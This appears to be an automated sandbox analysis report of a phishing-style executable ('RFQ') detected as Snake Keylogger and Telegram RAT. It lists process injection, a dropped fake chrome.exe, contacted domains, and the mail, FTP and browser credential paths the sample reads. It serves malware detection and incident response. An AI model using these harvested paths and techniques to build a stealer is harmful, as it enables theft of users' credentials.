                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, ?u0040???/ufffd?ufffd??.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                  Source: 1.0.RFQ__637456464647.exe.8f0000.13.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 1.0.RFQ__637456464647.exe.8f0000.1.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeMemory written: C:\Users\user\Desktop\RFQ__637456464647.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\Desktop\RFQ__637456464647.exe C:\Users\user\Desktop\RFQ__637456464647.exe
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Users\user\Desktop\RFQ__637456464647.exe VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Users\user\Desktop\RFQ__637456464647.exe VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AC60E0 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,_Init_thread_footer,CreateNamedPipeW,SetLastError,GetLastError,GetLastError,
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B8819C GetSystemTimeAsFileTime,
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A8B550 GetVersionExW,GetProductInfo,_Init_thread_footer,GetNativeSystemInfo,_Init_thread_footer,

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  1
                  Valid Accounts                  		2
                  Command and Scripting Interpreter                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		2
                  OS Credential Dumping                  		11
                  System Time Discovery                  		Remote Services1
                  Email Collection                  		Exfiltration Over Other Network Medium1
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Native API                  		Boot or Logon Initialization Scripts1
                  Access Token Manipulation                  		1
                  Access Token Manipulation                  		1
                  Input Capture                  		2
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Input Capture                  		Exfiltration Over Bluetooth1
                  Ingress Tool Transfer                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)112
                  Process Injection                  		1
                  Virtualization/Sandbox Evasion                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares11
                  Archive Collected Data                  		Automated Exfiltration2
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Disable or Modify Tools                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model2
                  Data from Local System                  		Scheduled Transfer2
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script112
                  Process Injection                  		LSA Secrets1
                  Remote System Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common11
                  Deobfuscate/Decode Files or Information                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                  Obfuscated Files or Information                  		DCSync15
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Software Packing                  		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  RFQ__637456464647.exe46%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
                  RFQ__637456464647.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\chrome.exe0%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\chrome.exe0%ReversingLabs

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  1.0.RFQ__637456464647.exe.400000.12.unpack100%AviraTR/ATRAPS.GenDownload File
                  1.2.RFQ__637456464647.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                  1.0.RFQ__637456464647.exe.400000.8.unpack100%AviraTR/ATRAPS.GenDownload File
                  1.0.RFQ__637456464647.exe.400000.6.unpack100%AviraTR/ATRAPS.GenDownload File
                  1.0.RFQ__637456464647.exe.400000.4.unpack100%AviraTR/ATRAPS.GenDownload File
                  1.0.RFQ__637456464647.exe.400000.10.unpack100%AviraTR/ATRAPS.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://dsssdsa.fa)Uri0%Avira URL Cloudsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://www.smartassembly.com/webservices/Reporting/UploadReport20%URL Reputationsafe
                  https://dsssdsa.fa0%Avira URL Cloudsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  http://www.smartassembly.com/webservices/Reporting/0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  http://www.smartassembly.com/webservices/UploadReportLogin/0%URL Reputationsafe
                  http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL0%URL Reputationsafe
                  http://checkip.dyndns.org4Jk0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  checkip.dyndns.com
                  		132.226.8.169
                  		truetrue
                    		unknown
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/true
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dsssdsa.fa)UriRFQ__637456464647.exefalse
                      • Avira URL Cloud: safe
                      		low
